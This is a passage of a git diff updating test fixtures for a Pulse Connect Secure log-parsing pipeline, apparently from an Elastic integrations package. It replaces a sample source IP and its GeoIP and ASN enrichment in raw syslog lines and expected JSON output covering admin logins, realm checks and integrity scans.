admin(ADMIN_REALM)[] - Primary authentication failed for admin/Administrators from 89.160.20.156 +Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[ADMIN_ROLE] - Login failed using auth server Administrators (Local Authentication). Reason: Failed +Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - Source IP realm restrictions successfully passed for admin/ADMIN_REALM +Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - User Limit realm restrictions successfully passed for admin/ADMIN_REALM +Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - Primary authentication successful for admin/Administrators fr diff --git a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-admin.log-expected.json b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-admin.log-expected.json index f2432029e7a..d44ee725ab4 100644 --- a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-admin.log-expected.json +++ b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-admin.log-expected.json @@ -7,24 +7,27 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, - "message": "Connection from IP 55.53.160.32 not authenticated yet (URL=/dana-na/auth/welcome.cgi?p=forced-off)", + "message": "Connection from IP 89.160.20.156 not authenticated yet (URL=/dana-na/auth/welcome.cgi?p=forced-off)", "tags": [ "preserve_original_event" ], @@ -44,26 +47,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:06.612377315Z", - "original": "Oct 19 10:20:40 pcs-node1 1 2021-10-19T10:20:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:40 - pcs-node1 - [55.53.160.32] System()[] - Connection from IP 55.53.160.32 not authenticated yet (URL=/dana-na/auth/welcome.cgi?p=forced-off)", + "ingested": "2021-12-14T14:54:25.429778819Z", + "original": "Oct 19 10:20:40 pcs-node1 1 2021-10-19T10:20:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:40 - pcs-node1 - [89.160.20.156] System()[] - Connection from IP 89.160.20.156 not authenticated yet (URL=/dana-na/auth/welcome.cgi?p=forced-off)", "category": "network", "timezone": "+02:00", "created": "2021-10-19T10:20:40.000+02:00", @@ -82,7 +88,7 @@ "address": "127.0.0.1", "ip": "127.0.0.1" }, - "message": "Connection from IP 55.53.160.32 not authenticated yet (URL=/dana-na/auth/url_o2d6zvh39ac6C92s/welcome.cgi?p=forced-off)", + "message": "Connection from IP 89.160.20.156 not authenticated yet (URL=/dana-na/auth/url_o2d6zvh39ac6C92s/welcome.cgi?p=forced-off)", "tags": [ "preserve_original_event" ], @@ -105,8 +111,8 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-08T13:53:06.612401424Z", - "original": "Oct 19 10:20:41 pcs-node1 1 2021-10-19T10:20:41+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:41 - pcs-node1 - [127.0.0.1] System()[] - Connection from IP 55.53.160.32 not authenticated yet (URL=/dana-na/auth/url_o2d6zvh39ac6C92s/welcome.cgi?p=forced-off)", + "ingested": "2021-12-14T14:54:25.429781241Z", + "original": "Oct 19 10:20:41 pcs-node1 1 2021-10-19T10:20:41+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:41 - pcs-node1 - [127.0.0.1] System()[] - Connection from IP 89.160.20.156 not authenticated yet (URL=/dana-na/auth/url_o2d6zvh39ac6C92s/welcome.cgi?p=forced-off)", "category": "network", "timezone": "+02:00", "created": "2021-10-19T10:20:41.000+02:00", @@ -123,22 +129,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "Source IP realm restrictions successfully passed for admin/ADMIN_REALM", "tags": [ @@ -160,26 +169,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:06.612404648Z", - "original": "Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - Source IP realm restrictions successfully passed for admin/ADMIN_REALM", + "ingested": "2021-12-14T14:54:25.429781841Z", + "original": "Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - Source IP realm restrictions successfully passed for admin/ADMIN_REALM", "category": "network", "timezone": "+02:00", "created": "2021-10-19T10:20:57.000+02:00", @@ -196,22 +208,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "User Limit realm restrictions successfully passed for admin/ADMIN_REALM", "tags": [ @@ -233,26 +248,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:06.612407638Z", - "original": "Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - User Limit realm restrictions successfully passed for admin/ADMIN_REALM", + "ingested": "2021-12-14T14:54:25.429782330Z", + "original": "Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - User Limit realm restrictions successfully passed for admin/ADMIN_REALM", "category": "network", "timezone": "+02:00", "created": "2021-10-19T10:20:57.000+02:00", @@ -269,22 +287,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "Login failed. Reason: Wrong Password", "tags": [ @@ -306,27 +327,30 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { "reason": "Wrong Password", - "ingested": "2021-12-08T13:53:06.612410576Z", - "original": "Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - Login failed. Reason: Wrong Password", + "ingested": "2021-12-14T14:54:25.429782737Z", + "original": "Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - Login failed. Reason: Wrong Password", "timezone": "+02:00", "created": "2021-10-19T10:20:57.000+02:00", "kind": "event", @@ -344,24 +368,27 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, - "message": "Primary authentication failed for admin/Administrators from 55.53.160.32", + "message": "Primary authentication failed for admin/Administrators from 89.160.20.156", "tags": [ "preserve_original_event" ], @@ -381,26 +408,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:06.612413511Z", - "original": "Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - Primary authentication failed for admin/Administrators from 55.53.160.32", + "ingested": "2021-12-14T14:54:25.429783165Z", + "original": "Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - Primary authentication failed for admin/Administrators from 89.160.20.156", "category": "network", "timezone": "+02:00", "created": "2021-10-19T10:20:57.000+02:00", @@ -417,22 +447,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "Login failed using auth server Administrators (Local Authentication). Reason: Failed", "tags": [ @@ -454,27 +487,30 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { "reason": "Failed", - "ingested": "2021-12-08T13:53:06.612416432Z", - "original": "Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[ADMIN_ROLE] - Login failed using auth server Administrators (Local Authentication). Reason: Failed", + "ingested": "2021-12-14T14:54:25.429783583Z", + "original": "Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[ADMIN_ROLE] - Login failed using auth server Administrators (Local Authentication). Reason: Failed", "timezone": "+02:00", "created": "2021-10-19T10:20:57.000+02:00", "kind": "event", @@ -492,22 +528,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "Source IP realm restrictions successfully passed for admin/ADMIN_REALM", "tags": [ @@ -529,26 +568,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:06.612419343Z", - "original": "Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - Source IP realm restrictions successfully passed for admin/ADMIN_REALM", + "ingested": "2021-12-14T14:54:25.429783989Z", + "original": "Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - Source IP realm restrictions successfully passed for admin/ADMIN_REALM", "category": "network", "timezone": "+02:00", "created": "2021-10-19T10:21:07.000+02:00", @@ -565,22 +607,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "User Limit realm restrictions successfully passed for admin/ADMIN_REALM", "tags": [ @@ -602,26 +647,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:06.612422269Z", - "original": "Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - User Limit realm restrictions successfully passed for admin/ADMIN_REALM", + "ingested": "2021-12-14T14:54:25.429784392Z", + "original": "Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - User Limit realm restrictions successfully passed for admin/ADMIN_REALM", "category": "network", "timezone": "+02:00", "created": "2021-10-19T10:21:07.000+02:00", @@ -638,22 +686,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "Primary authentication successful for admin/Administrators fr", "tags": [ @@ -675,26 +726,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:06.612425184Z", - "original": "Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - Primary authentication successful for admin/Administrators fr", + "ingested": "2021-12-14T14:54:25.429784792Z", + "original": "Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - Primary authentication successful for admin/Administrators fr", "category": "network", "timezone": "+02:00", "created": "2021-10-19T10:21:07.000+02:00", diff --git a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-system.log b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-system.log index 9750474aeb8..846e75145ec 100644 --- a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-system.log +++ b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-system.log @@ -1,7 +1,7 @@ Oct 19 09:11:09 pcs-node0 1 2021-10-19T09:11:09+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:09 - pcs-node0 - [127.0.0.1] System()[] - No new virus signature list available from 'https://download.pulsesecure.net/software/av/uac/epupdate_hist.xml'. -Oct 19 09:11:55 pcs-node1 1 2021-10-19T09:11:55+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:55 - pcs-node1 - [55.53.160.32] System(REALM)[] - User Limit realm restrictions successfully passed for /REALM +Oct 19 09:11:55 pcs-node1 1 2021-10-19T09:11:55+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:55 - pcs-node1 - [89.160.20.156] System(REALM)[] - User Limit realm restrictions successfully passed for /REALM Oct 19 09:18:34 pcs-node0 1 2021-10-19T09:18:34+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:18:34 - pcs-node0 - [127.0.0.1] System()[] - Integrity Checker Tool: Periodic Scan Started! Oct 19 09:18:47 pcs-node0 1 2021-10-19T09:18:47+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:18:47 - pcs-node0 - [127.0.0.1] System()[] - Integrity Scan Completed: Integrity Scan Results : Matched Files 18773, Newly Detected Files 0, Mismatched Files 0 Oct 19 09:18:47 pcs-node0 1 2021-10-19T09:18:47+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:18:47 - pcs-node0 - [127.0.0.1] System()[] - Integrity Checker Tool: Periodic Scan Finished! -Oct 19 09:11:19 pcs-node1 1 2021-10-19T09:11:19+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:19 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - User user.name denied access as the client version '9.1.11.6725' is lower than the minimum client version configured -Oct 19 09:16:34 pcs-node1 1 2021-10-19T09:16:34+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:34 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Session timed out for user.name/REALM (session:sid03ac4653fd74a5ac36cffb2783be3309590f3d616617a4a7) due to inactivity (last access at 09:05:47 2021/10/19). Idle session identified during routine system scan. +Oct 19 09:11:19 pcs-node1 1 2021-10-19T09:11:19+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:19 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - User user.name denied access as the client version '9.1.11.6725' is lower than the minimum client version configured +Oct 19 09:16:34 pcs-node1 1 2021-10-19T09:16:34+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:34 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Session timed out for user.name/REALM (session:sid03ac4653fd74a5ac36cffb2783be3309590f3d616617a4a7) due to inactivity (last access at 09:05:47 2021/10/19). Idle session identified during routine system scan. diff --git a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-system.log-expected.json b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-system.log-expected.json index 70c7f3e86be..b45019c86fc 100644 --- a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-system.log-expected.json +++ b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-system.log-expected.json @@ -32,7 +32,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-08T13:53:09.222367818Z", + "ingested": "2021-12-14T14:54:26.631293953Z", "original": "Oct 19 09:11:09 pcs-node0 1 2021-10-19T09:11:09+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:09 - pcs-node0 - [127.0.0.1] System()[] - No new virus signature list available from 'https://download.pulsesecure.net/software/av/uac/epupdate_hist.xml'.", "category": "network", "timezone": "+02:00", @@ -50,22 +50,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "User Limit realm restrictions successfully passed for /REALM", "tags": [ @@ -87,26 +90,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:09.222373494Z", - "original": "Oct 19 09:11:55 pcs-node1 1 2021-10-19T09:11:55+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:55 - pcs-node1 - [55.53.160.32] System(REALM)[] - User Limit realm restrictions successfully passed for /REALM", + "ingested": "2021-12-14T14:54:26.631296826Z", + "original": "Oct 19 09:11:55 pcs-node1 1 2021-10-19T09:11:55+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:55 - pcs-node1 - [89.160.20.156] System(REALM)[] - User Limit realm restrictions successfully passed for /REALM", "category": "network", "timezone": "+02:00", "created": "2021-10-19T09:11:55.000+02:00", @@ -148,7 +154,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-08T13:53:09.222376588Z", + "ingested": "2021-12-14T14:54:26.631297230Z", "original": "Oct 19 09:18:34 pcs-node0 1 2021-10-19T09:18:34+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:18:34 - pcs-node0 - [127.0.0.1] System()[] - Integrity Checker Tool: Periodic Scan Started!", "category": "network", "timezone": "+02:00", @@ -191,7 +197,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-08T13:53:09.222388376Z", + "ingested": "2021-12-14T14:54:26.631297597Z", "original": "Oct 19 09:18:47 pcs-node0 1 2021-10-19T09:18:47+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:18:47 - pcs-node0 - [127.0.0.1] System()[] - Integrity Scan Completed: Integrity Scan Results : Matched Files 18773, Newly Detected Files 0, Mismatched Files 0", "category": "network", "timezone": "+02:00", @@ -234,7 +240,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-08T13:53:09.222391395Z", + "ingested": "2021-12-14T14:54:26.631297960Z", "original": "Oct 19 09:18:47 pcs-node0 1 2021-10-19T09:18:47+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:18:47 - pcs-node0 - [127.0.0.1] System()[] - Integrity Checker Tool: Periodic Scan Finished!", "category": "network", "timezone": "+02:00", @@ -252,22 +258,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "User user.name denied access as the client version '9.1.11.6725' is lower than the minimum client version configured", "tags": [ @@ -289,26 +298,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 